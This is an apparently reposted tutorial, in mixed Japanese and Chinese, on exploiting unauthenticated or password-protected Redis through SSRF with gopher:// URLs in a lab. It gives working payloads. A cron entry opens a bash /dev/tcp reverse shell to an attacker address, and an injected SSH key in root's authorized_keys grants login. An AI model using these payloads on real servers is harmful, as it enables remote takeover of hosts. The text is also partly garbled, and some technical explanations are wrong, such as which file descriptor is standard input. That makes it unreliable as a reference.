ホームページ > データベース > Redis > Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

WBOY
リリース: 2023-05-30 09:18:28
転載
1337 人が閲覧しました

SSRF、つまりサーバー側のリクエスト フォージェリ。ユーザーは、サーバーによって要求されたリソース、プロトコル、パスなどを制御できます。これにより、SSRF 攻撃が発生する可能性があります。

この記事では、gopher プロトコルと getshell を介した Redis サービスに対する SSRF 攻撃に焦点を当てます。

gopher プロトコルの形式

まず gopher プロトコルとは何か、その形式がどのようなものかを理解します:

gopher://:_TCP データ ストリームが続きます

redis での攻撃をテストするときは、テスト用に Linux に付属するカールを使用できます。

Centos を使用している場合、実験を確実に成功させるために、Centos selinux をオフにすることをお勧めします。

selinuxを閉じる:

setenforce 0

redisを攻撃

(1) 実験環境のセットアップ

virtual Centos7をインストールするだけです。

redis インストール:

wget http://download.redis.io/releases/redis-4.0.6.tar.gz //redis 圧縮パッケージをダウンロード

yum install gcc //インストール時に Gcc が必要です make

tar -xzvf redis-4.0.6.tar.gz //圧縮パッケージを解凍します cd redis-4.0.6 //圧縮パッケージのディレクトリを入力します

make MALLOC=libc //Compile

cd src //コンパイルが完了すると、フォルダー src が生成されるので、その src フォルダーに入ります

make install //インストール

redis 操作:

redis-4.0.6 ディレクトリ では、redis.conf が初期 Redis 構成ファイルです

redis-4.0.6/src ディレクトリ には、最も重要な実行可能ファイルが 2 つあります:

redis-server --server

redis- cli -- クライアント

はサーバー プログラムを直接実行して、redis サービスを開始します。

./redis-server
ログイン後にコピー

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

クライアント プログラムを直接実行し、デフォルトでローカル Redis サービスに接続します。

./redis-cli
ログイン後にコピー

(2) 事前の調査と導入

パスワードなしの Redis を攻撃してみる:

まず、パケット キャプチャ ソフトウェアをオンにして、redis と通信するデータ パケットをキャプチャする必要があります。

Linux では、tcpdump を使用してトラフィックをキャプチャできます。

tcpdump -i lo -s 0 port 6379 -w redis.pcap
ログイン後にコピー

ローカル インターフェイスのトラフィックをキャプチャする場合は、eth0 ではなく lo であることに注意してください。

ログに記録されます。最初に入力してから、set key オペレーションを実行します。

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

tcpdump によってキャプチャされたパケットをエクスポートし、wireshark で開き、TCP フローを追跡します。

見た目だけサーバーではなく、入力したデータで返されたデータには、次の数行しかないことがわかります。

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

「データの表示と保存名」の位置で、[Hex dump] を選択すると、次のデータが得られます:

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

赤いボックスは後で使用するものですペイロード

すべてをコピーしてエディターを使用します赤いボックスを除く無関係なデータをすべて削除します

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

#次に、各 16 進値の前にパーセント記号を追加して 1 つに並べます利用可能:

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

curl リクエストの構築:

curl -v 'gopher://127.0.0.1:6379/_%2a%31%0d%0a%24%37%0d%0a%43%4f%4d%4d%41%4e%44%0d%0a%2a%33%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%34%0d%0a%6b%65%79%31%0d%0a%24%36%0d%0a%76%61%6c%75%65%31%0d%0a' --output -
ログイン後にコピー
エコー:

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

クエリ キー:

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

キーは正常に設定できました。

パスワードを使用して redis を攻撃してみます:

まず、ログインにパスワードを要求するように redis を構成します:

redis の下の構成ファイルを変更します

redis.conf で、requirepass キーワードを検索します。

デフォルトの

requirepass がコメント化されているので、 コメント記号 を削除し、requirepass の後に Redis に設定したい を入力します。パスワード

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

構成後、redis を開始するコマンドは次のとおりです:

./redis-server redis配置文件路径
ログイン後にコピー

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

試行します攻撃パスワード redis:

まず、tcpdump パケット キャプチャを有効にしてから、redis コマンド ラインで操作を実行します:

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

トラフィックを再度キャプチャします。操作前と同様に、パスワードの検証は追加の認証コマンドを追加することを意味することがわかりました:

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

重复上文的步骤即可。

(2)GetShell:

接下来讲重点:通过 set key GetShell:

思路:

(1)将反弹shell命令写到定时任务里,攻击机只需要开一个netcat端口即可。

(2)写入ssh-keygen,进行ssh免密登录。

一个个细细道来。

(1)定时任务反弹shell

基本要求:

redis需要是以 root 权限运行,不然写不到 /var/spool/cron/ 目录下

1.首先得知道 Linux 下的定时任务是个什么东西:

Linux下设置定时任务命令为 crontab

配置文件为 /etc/crontab

下面这张图是配置文件里的内容,很好的说明了 crontab 配置的格式

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

这个配置文件应该只是供参考用的,我们的定时任务需要自己手动写在 /var/spool/cron/ 目录下

如果我们要每分钟执行一次命令 echo1 > /tmp/1.txt

则可以这么操作:

vim /var/spool/cron/root //root是文件名,一般以执行的用户命名

在文件中写入

* * * * * root echo1 > /tmp/1.txt

保存退出后,重启 crontab 服务:

systemctl restart crond.service

即可每一分钟执行一次该命令

2.接着要知道linux下通过输入输出流反弹shell

 命令:

/bin/bash -i >& /dev/tcp/192.168.1.105/8888 0>&1
ログイン後にコピー

 直接看效果:Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

这里巧妙的结合了Linux中 文件描述符、重定向符和 /dev/

文件描述符 1 表示标准输入

文件描述符 2 表示标准输出

/bin/bash -i 表示的是调用bash命令的交互模式,并将交互模式重定向到 /dev/tcp/192.168.1.105/8888 中。

重定向时加入一个描述符 &,表示直接作为数据流输入。不加 & 时,重定向默认是输出到文件里的。

做个实例就清晰明了了

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

/dev/tcp/ip地址/端口号 是linux下的特殊文件,表示对这个地址端口进行tcp连接

这里我们设置成攻击机监听的地址

最后面的 0>&1 。此时攻击机和靶机已经建立好了连接,攻击机的输入就是从标准输入0传送至靶机

通过重定向符,重定向到 1(标准输入)中,由于是作为 /bin/bash 的标准输入,所以就执行了系统命令了。

3.还需要知道Redis如何写入文件

Redis 中可以导出当前数据库中的 key 和 value

并且可以通过命令配置导出路径和文件名:

config set dir /tmp/test      //设置导出路径
config set dbfilename root    //设置导出文件名
save                          //执行导出操作
ログイン後にコピー

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

可以看到,格式非常乱。不过还好linux中的cron不会报错,只要读到一行正确配置即可执行。

通过crontab定时任务 getshell

为了能让linux能够正确读到一行,我们在 set key 的时候手动添加 \n(换行)

redis语句:

config set dir /var/spool/cron
config set dbfilename root
set test1 "\n\n\n* * * * * /bin/bash -i >& /dev/tcp/192.168.1.105/8888 0>&1\n\n\n"
save
ログイン後にコピー

转换成 gopher协议,进行curl请求:

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

成功写入:

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

成功getshell:

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

注意:这里有一个坑点。

cron文件不需要写用户名,不然会报错:

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

(2)ssh免密登录

在linux中,ssh可配置成免密登录。

需要修改 ssh 配置文件 /etc/ssh/sshd_config

#StrictModes yes
ログイン後にコピー

改为

StrictModes no
ログイン後にコピー

然后重启sshd即可

免密登录条件:

客户端生成公钥和私钥

将公钥上传至服务端 即可

在SSRF利用中,同样需要root权限运行 redis

如果不是root权限,需要能够 ssh 登录的用户权限运行 redis

正常免密登录流程:

1.客户端先生成公钥和私钥

使用工具 ssh-keygen:

ssh-keygen -t rsa
ログイン後にコピー

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

执行完毕后将会在 用户家目录中的 .ssh文件夹中放有公钥与私钥 文件

有.pub后缀的就是公钥,没有.pub后缀的就是私钥

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

2.上传公钥至服务器

将公钥上传至服务端的 /root/.ssh目录下

嫌麻烦可以用 ssh-copy-id工具

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

3.重命名文件为authorized_keys

文件名要重命名为 authorized_keys

authorized_keys 文件内容如下:

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

如果有多台客户端需要免密登录,新起一行,新行中写对应的客户端的公钥值即可

类似这样:

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

4.免密登录

传好后即可免密登录:

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

ssh免密登录 getshelll

我们知道了要写入的文件位置、要写入的内容(公钥事先生成好),我们可以构造redis语句了:

//先配置路径
config set dir /root/.ssh      
config set dbfilename authorized_keys
//写入公钥
set test2 "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC/unZTA0b1HtFsgjXlWM4Bt65Ubx72z/dkLJrqCJJpfsD+F27uix6J3GWuIKaHurabFR40eJ2EqWWs/FCKpBvnJ+msSWWyn9C8WyWY19HydE9ldIO8SjdoOfQ7pf0Q2dwMKSr6F3L8Dy04ULQsCwGEu8X0fdwCZIggagTwGXWZS/M89APJKSVn7v5jhgRy/dCSGwN5wwFakSQSbWtW396V/iP2svU7IAznqIX4tyZII/DX1751LqA0ufVzIoK1Sc9E87swjupDD4ZGxX6ks676JYQHdZSYHoQioM9kWVsB2ntBfBsIFHu+yX1V9tkTTB0E5eaWuitzzsi8xfAz0xBag3f8wiPvlbuLV/TwOXHABGt1HQNhg5wnfZYnebRNdn5QeDXNY1XtLjc3T9UTYe7FmT6hG+RvI+7OSywDIvaGq+PjAQN1KPOBFJtNG5iha3bYds05zR5LCM8ZzLRTcKP9Djo79fum8iOC8DjrxVp49RilDobr1/oZzn+91YJIq1M= root@kali\n\n\n"
//保存
save
ログイン後にコピー

改成gopher协议格式: 

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

查看 authorized_keys 文件:

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例 

成功免密登录:

Redis でのサーバー側リクエスト フォージェリ SSRF の分析例

以上がRedis でのサーバー側リクエスト フォージェリ SSRF の分析例の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

関連ラベル:
ソース:yisu.com
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
人気のチュートリアル
詳細>
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート